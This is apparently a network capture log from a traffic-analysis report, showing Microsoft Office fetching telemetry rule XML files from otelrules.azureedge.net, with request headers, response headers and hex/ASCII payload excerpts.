                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              115192.168.2.46383813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:16 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                              x-ms-request-id: 2d5f12d0-a01e-0053-6a09-2c8603000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061616Z-16ccfc498979nn5nhC1DFWk16800000001pg00000000ppb1
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              116192.168.2.46383613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:16 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                              x-ms-request-id: e8f856ea-301e-0052-0e8f-2b65d6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061616Z-16ccfc49897hrp7xhC1DFW7ud400000001pg000000008g66
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              117192.168.2.46383913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:17 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                              x-ms-request-id: a48d9891-501e-0029-7533-2cd0b8000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061617Z-16dc884887bvr5slhC1DFWw7rw00000001kg000000003fzd
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              118192.168.2.46384113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:17 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                              x-ms-request-id: 60e97882-101e-0065-7a28-2c4088000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061617Z-176bd8f9bc5pqws8hC1DFW15kc00000001eg000000003sn2
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              119192.168.2.46384013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:17 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                              x-ms-request-id: e9cefd19-301e-0052-64ca-2b65d6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061617Z-16ccfc49897xnlwfhC1DFWz50s00000001pg00000000devt
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              120192.168.2.46384313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:17 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1388
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                              x-ms-request-id: c65f15a7-401e-0048-5447-2c0409000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061617Z-16ccfc49897w6rdhhC1DFWb10w00000001p000000000930z
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              121192.168.2.46384213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:17 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1425
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                              x-ms-request-id: ea16d2af-801e-00a0-7809-2c2196000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061617Z-16dc884887bqz426hC1DFWhv2000000001mg0000000070hm
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:17 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              122192.168.2.46384413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:18 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                              x-ms-request-id: 6c1a7e39-101e-00a2-7b09-2c9f2e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061618Z-16ccfc49897774xmhC1DFWuraw00000001qg000000000g46
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              123192.168.2.46384813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:18 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:18 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                              x-ms-request-id: 3ed94d04-001e-0065-2e09-2c0b73000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
